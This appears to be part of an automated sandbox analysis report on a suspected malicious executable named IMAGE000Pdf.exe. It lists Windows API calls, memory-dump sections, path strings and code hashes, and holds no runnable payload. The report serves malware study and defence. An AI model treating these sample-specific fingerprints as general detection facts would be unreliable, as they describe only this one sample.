                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: CharNext
                                      • String ID: C:\
                                      • API String ID: 3213498283-3404278061
                                      • Opcode ID: a494e05d27702b27be76eb2108b1f7c475580a471c546fdda9206c4fb56a95c9
                                      • Instruction ID: 839f6a4cd7818f8bbcc29dd9d6e935739f9a8baf6e4a15472bca77c663bd0c43
                                      • Opcode Fuzzy Hash: a494e05d27702b27be76eb2108b1f7c475580a471c546fdda9206c4fb56a95c9
                                      • Instruction Fuzzy Hash: 1FF09022920F1296DB3177545C4DE7B5BB8EF54760B00C43BE601B72C1E3B84C818EAA
                                      APIs
                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040348F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00405CC9
                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040348F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00405CD3
                                      • lstrcatW.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405CE5
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: CharPrevlstrcatlstrlen
                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 2659869361-823278215
                                      • Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                      • Instruction ID: 20018de61182ae54b5e078598b4ece42ca391df12eccfc729252e8f5514d5294
                                      • Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                      • Instruction Fuzzy Hash: 78D0A731101A30AAD1117B448D04CDF629CFE85304341403BF202B30A2C77C1D5387FD
                                      APIs
                                      • DestroyWindow.USER32(00000000,00000000,0040318F,00000001,?,00000007,00000009,0000000B), ref: 00402FC4
                                      • GetTickCount.KERNEL32 ref: 00402FE2
                                      • CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00402FFF
                                      • ShowWindow.USER32(00000000,00000005,?,00000007,00000009,0000000B), ref: 0040300D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                      • String ID:
                                      • API String ID: 2102729457-0
                                      • Opcode ID: 5e41244d60e94df7afa5422e741b36603cd51d1290bb4582c8306ab25b36019d
                                      • Instruction ID: 8c281f3aa7e88f802b7d8bba4993e69035ed424970cff038758a163d63a680ad
                                      • Opcode Fuzzy Hash: 5e41244d60e94df7afa5422e741b36603cd51d1290bb4582c8306ab25b36019d
                                      • Instruction Fuzzy Hash: 3AF0BE30506221ABC2616F60FE0CA8B3B78FB44B51705C83BF101F11E4CB3808819B9D
                                      APIs
                                      • FreeLibrary.KERNEL32(?,75923420,00000000,C:\Users\user\AppData\Local\Temp\,00403A00,00403816,00000007,?,00000007,00000009,0000000B), ref: 00403A42
                                      • GlobalFree.KERNEL32(00A42B10), ref: 00403A49
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A28
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: Free$GlobalLibrary
                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 1100898210-823278215
                                      • Opcode ID: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                                      • Instruction ID: 10b089f61d7fd26560bcfb3f790e8945b6a0be01d7b58778b04adbc7300f8739
                                      • Opcode Fuzzy Hash: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                                      • Instruction Fuzzy Hash: 64E0123360112057C6215F45FE0475ABB7D6F49B26F06803BE9C0BB26087785C838FD8
                                      APIs
                                      • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\IMAGE000Pdf.exe,C:\Users\user\Desktop\IMAGE000Pdf.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D15
                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\IMAGE000Pdf.exe,C:\Users\user\Desktop\IMAGE000Pdf.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D25
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: CharPrevlstrlen
                                      • String ID: C:\Users\user\Desktop
                                      • API String ID: 2709904686-1246513382
                                      • Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                      • Instruction ID: 3b4219a6871f3e4e2040e57eeeef2aaac809f1ec38f5d31038b50c09059f2d31
                                      • Opcode Fuzzy Hash: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                      • Instruction Fuzzy Hash: 97D05EB34109209AE3127704DC0599F73E8EF5530074A8467E541A61A5D7785C818AAC
                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 6F93116A
                                      • GlobalFree.KERNEL32(00000000), ref: 6F9311C7
                                      • GlobalFree.KERNEL32(00000000), ref: 6F9311D9
                                      • GlobalFree.KERNEL32(?), ref: 6F931203
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2482669839.000000006F931000.00000020.00000001.01000000.00000006.sdmp, Offset: 6F930000, based on PE: true
                                      • Associated: 00000000.00000002.2482628772.000000006F930000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.2482700059.000000006F934000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.2482741619.000000006F936000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6f930000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: Global$Free$Alloc
                                      • String ID:
                                      • API String ID: 1780285237-0
                                      • Opcode ID: ea40ce4848291e97f66877f866d949fdf7c81ffa377a4489a503f1d4b56f2031
                                      • Instruction ID: 4dfbaa96b681971ba2248e00b908c9d467b34707119771aa97ecb1860fe765b6
                                      • Opcode Fuzzy Hash: ea40ce4848291e97f66877f866d949fdf7c81ffa377a4489a503f1d4b56f2031
                                      • Instruction Fuzzy Hash: 5E3165B7D042229FE7208FBCC9459B677E8EB5B320700451AE844D71F4E776E8918F61
                                      APIs
                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000), ref: 00405E59
                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E71
                                      • CharNextA.USER32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000), ref: 00405E82
                                      • lstrlenA.KERNEL32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000), ref: 00405E8B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444883935.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: lstrlen$CharNextlstrcmpi
                                      • String ID:
                                      • API String ID: 190613189-0
                                      • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                      • Instruction ID: a1795947179755a411c98c1569971d2b6f4e38ea7894d212e8297337e4f71977
                                      • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                      • Instruction Fuzzy Hash: E2F06231504514FFD7129BA5DD409AEBBA8EF06250B2540BAE884FB250D674DF029BE9